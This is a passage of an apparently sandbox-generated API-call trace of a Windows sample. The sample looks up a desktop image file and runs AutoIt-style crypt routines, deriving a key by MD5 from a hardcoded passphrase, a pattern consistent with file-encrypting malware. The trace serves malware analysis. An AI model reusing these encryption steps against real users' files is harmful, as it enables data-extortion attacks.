dwFlags=0x0, lpMem=0x43e2300 | out: hHeap=0x1780000) returned 1 [0126.453] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2150 | out: hHeap=0x1780000) returned 1 [0126.453] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac200 | out: hHeap=0x1780000) returned 1 [0126.453] PeekMessageW (in: lpMsg=0x144f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f114) returned 0 [0126.453] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2300 | out: hHeap=0x1780000) returned 1 [0126.453] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21f0 | out: hHeap=0x1780000) returned 1 [0126.454] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2300 | out: hHeap=0x1780000) returned 1 [0126.454] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21f0 | out: hHeap=0x1780000) returned 1 [0126.454] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2240 | out: hHeap=0x1780000) returned 1 [0126.454] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0126.454] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d58 | out: hHeap=0x1780000) returned 1 [0126.454] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2240 | out: hHeap=0x1780000) returned 1 [0126.454] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d70 | out: hHeap=0x1780000) returned 1 [0126.454] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21f0 | out: hHeap=0x1780000) returned 1 [0126.454] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9bf0 | out: hHeap=0x1780000) returned 1 [0126.454] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2320 | out: hHeap=0x1780000) returned 1 [0126.454] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d58 | out: hHeap=0x1780000) returned 1 [0126.454] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2200 | out: hHeap=0x1780000) returned 1 [0126.454] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x772d0000 [0126.454] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0126.454] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x43c9d70, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0126.454] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d70 | out: hHeap=0x1780000) returned 1 [0126.454] GetProcAddress (hModule=0x772d0000, lpProcName="CloseHandle") returned 0x7733eab0 [0126.454] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d58 | out: hHeap=0x1780000) returned 1 [0126.454] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2150 | out: hHeap=0x1780000) returned 1 [0126.455] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2200 | out: hHeap=0x1780000) returned 1 [0126.455] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf360 | out: hHeap=0x1780000) returned 1 [0126.455] CloseHandle (hObject=0x2a0) returned 1 [0126.455] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d70 | out: hHeap=0x1780000) returned 1 [0126.455] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2130 | out: hHeap=0x1780000) returned 1 [0126.455] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d58 | out: hHeap=0x1780000) returned 1 [0126.455] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0126.455] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2240 | out: hHeap=0x1780000) returned 1 [0126.455] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d70 | out: hHeap=0x1780000) returned 1 [0126.455] FreeLibrary (hLibModule=0x772d0000) returned 1 [0126.455] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21f0 | out: hHeap=0x1780000) returned 1 [0126.455] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf4a0 | out: hHeap=0x1780000) returned 1 [0126.455] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9b90 | out: hHeap=0x1780000) returned 1 [0126.455] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2300 | out: hHeap=0x1780000) returned 1 [0126.455] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c38 | out: hHeap=0x1780000) returned 1 [0126.455] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e00 | out: hHeap=0x1780000) returned 1 [0126.455] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9bd8 | out: hHeap=0x1780000) returned 1 [0126.455] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9cf8 | out: hHeap=0x1780000) returned 1 [0126.455] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c68 | out: hHeap=0x1780000) returned 1 [0126.455] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d28 | out: hHeap=0x1780000) returned 1 [0126.455] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c80 | out: hHeap=0x1780000) returned 1 [0126.455] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d40 | out: hHeap=0x1780000) returned 1 [0126.455] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e78 | out: hHeap=0x1780000) returned 1 [0126.455] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf658 | out: hHeap=0x1780000) returned 1 [0126.455] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9bf0 | out: hHeap=0x1780000) returned 1 [0126.455] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d58 | out: hHeap=0x1780000) returned 1 [0126.456] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2320 | out: hHeap=0x1780000) returned 1 [0126.456] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e8f00 | out: hHeap=0x1780000) returned 1 [0126.456] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2200 | out: hHeap=0x1780000) returned 1 [0126.456] PeekMessageW (in: lpMsg=0x144f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f114) returned 0 [0126.456] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21f0 | out: hHeap=0x1780000) returned 1 [0126.456] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90b0 | out: hHeap=0x1780000) returned 1 [0126.456] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c20 | out: hHeap=0x1780000) returned 1 [0126.456] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ce0 | out: hHeap=0x1780000) returned 1 [0126.456] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf630 | out: hHeap=0x1780000) returned 1 [0126.456] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e22f0 | out: hHeap=0x1780000) returned 1 [0126.456] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf450 | out: hHeap=0x1780000) returned 1 [0126.456] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d88 | out: hHeap=0x1780000) returned 1 [0126.456] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c50 | out: hHeap=0x1780000) returned 1 [0126.456] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21e0 | out: hHeap=0x1780000) returned 1 [0126.456] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf838 | out: hHeap=0x1780000) returned 1 [0126.456] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9cc8 | out: hHeap=0x1780000) returned 1 [0126.456] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2180 | out: hHeap=0x1780000) returned 1 [0126.456] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf428 | out: hHeap=0x1780000) returned 1 [0126.456] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d10 | out: hHeap=0x1780000) returned 1 [0126.456] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e60 | out: hHeap=0x1780000) returned 1 [0126.456] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf810 | out: hHeap=0x1780000) returned 1 [0126.456] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21f0 | out: hHeap=0x1780000) returned 1 [0126.456] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fe8 | out: hHeap=0x1780000) returned 1 [0126.456] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0126.456] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2230 | out: hHeap=0x1780000) returned 1 [0126.456] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e22c0 | out: hHeap=0x1780000) returned 1 [0126.456] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0126.457] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4392490 | out: hHeap=0x1780000) returned 1 [0126.457] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2320 | out: hHeap=0x1780000) returned 1 [0126.457] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21e0 | out: hHeap=0x1780000) returned 1 [0126.457] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e78 | out: hHeap=0x1780000) returned 1 [0126.457] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0126.457] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21f0 | out: hHeap=0x1780000) returned 1 [0126.457] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e22c0 | out: hHeap=0x1780000) returned 1 [0126.457] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e22c0 | out: hHeap=0x1780000) returned 1 [0126.457] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2240 | out: hHeap=0x1780000) returned 1 [0126.457] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c50 | out: hHeap=0x1780000) returned 1 [0126.457] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d40 | out: hHeap=0x1780000) returned 1 [0126.457] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c68 | out: hHeap=0x1780000) returned 1 [0126.457] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d58 | out: hHeap=0x1780000) returned 1 [0126.457] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d70 | out: hHeap=0x1780000) returned 1 [0126.457] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2200 | out: hHeap=0x1780000) returned 1 [0126.457] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9bd8 | out: hHeap=0x1780000) returned 1 [0126.457] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2150 | out: hHeap=0x1780000) returned 1 [0126.457] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9bd8 | out: hHeap=0x1780000) returned 1 [0126.457] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0126.457] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2150 | out: hHeap=0x1780000) returned 1 [0126.457] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0126.457] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0126.457] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca760 | out: hHeap=0x1780000) returned 1 [0126.457] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0126.458] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0126.458] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0126.458] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0126.458] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0126.458] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\V_VfUPg6JY sjdteIA3.gif", lpFindFileData=0x144ed28 | out: lpFindFileData=0x144ed28*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x700cfec0, ftCreationTime.dwHighDateTime=0x1d5ef11, ftLastAccessTime.dwLowDateTime=0xb0963b40, ftLastAccessTime.dwHighDateTime=0x1d5f016, ftLastWriteTime.dwLowDateTime=0xb0963b40, ftLastWriteTime.dwHighDateTime=0x1d5f016, nFileSizeHigh=0x0, nFileSizeLow=0xa4a, dwReserved0=0x43c34c0, dwReserved1=0x8, cFileName="V_VfUPg6JY sjdteIA3.gif", cAlternateFileName="V_VFUP~1.GIF")) returned 0x41ac2c0 [0126.458] FindClose (in: hFindFile=0x41ac2c0 | out: hFindFile=0x41ac2c0) returned 1 [0126.458] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0126.458] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0126.458] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb08 | out: hHeap=0x1780000) returned 1 [0126.458] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0126.458] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca688 | out: hHeap=0x1780000) returned 1 [0126.458] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0126.458] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0126.458] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0126.458] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0126.458] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0126.458] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd10 | out: hHeap=0x1780000) returned 1 [0126.458] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0126.459] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0126.459] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4392570 | out: hHeap=0x1780000) returned 1 [0126.459] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0126.459] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0126.459] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0126.459] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90b0 | out: hHeap=0x1780000) returned 1 [0126.459] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0126.459] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797088 | out: hHeap=0x1780000) returned 1 [0126.459] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0126.459] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0126.459] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0126.459] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0126.459] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0126.459] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x756e0000 [0126.459] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0126.459] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0126.459] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd10 | out: hHeap=0x1780000) returned 1 [0126.459] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0126.459] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0126.459] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0126.459] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0126.459] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0126.459] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0126.459] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0126.460] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0126.460] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4392340 | out: hHeap=0x1780000) returned 1 [0126.460] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0126.460] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0126.460] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0126.460] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0126.460] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0126.460] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0126.460] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0126.460] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9338 | out: hHeap=0x1780000) returned 1 [0126.460] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0126.460] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb80 | out: hHeap=0x1780000) returned 1 [0126.460] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0126.460] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0126.460] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0126.460] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x1796f08, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0126.460] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0126.460] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x1796e08, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0126.461] CryptAcquireContextA (in: phProv=0x144ea08, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x144ea08*=0x41a5250) returned 1 [0126.461] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0126.461] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0126.461] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0126.461] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0126.461] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0126.461] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0126.461] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0126.462] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0126.462] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0126.462] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0126.462] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x43ca9a0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0126.462] CryptCreateHash (in: hProv=0x41a5250, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x144e778 | out: phHash=0x144e778) returned 1 [0126.462] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0126.462] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2b48, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0126.462] CharLowerBuffW (in: lpsz="byte[34]", cchLength=0x8 | out: lpsz="byte[34]") returned 0x8 [0126.462] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2b18 [0126.462] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0126.462] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28c0 [0126.462] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0126.462] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2770 [0126.462] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0126.462] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2900 [0126.462] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca790 [0126.462] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28d0 [0126.462] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2780 [0126.462] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x22) returned 0x17e2c08 [0126.462] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796fe8 [0126.462] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2b48 [0126.462] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca970 [0126.463] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2840 [0126.463] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0148 [0126.463] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0126.463] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2860 [0126.463] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796d68 [0126.463] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2b18 [0126.463] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0126.463] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28c0 [0126.463] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0126.463] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2920 [0126.463] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0126.463] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2880 [0126.463] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0126.463] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x22) returned 0x17e2bd8 [0126.463] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x23) returned 0x17e28a8 [0126.463] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2850 [0126.463] WideCharToMultiByte (in: 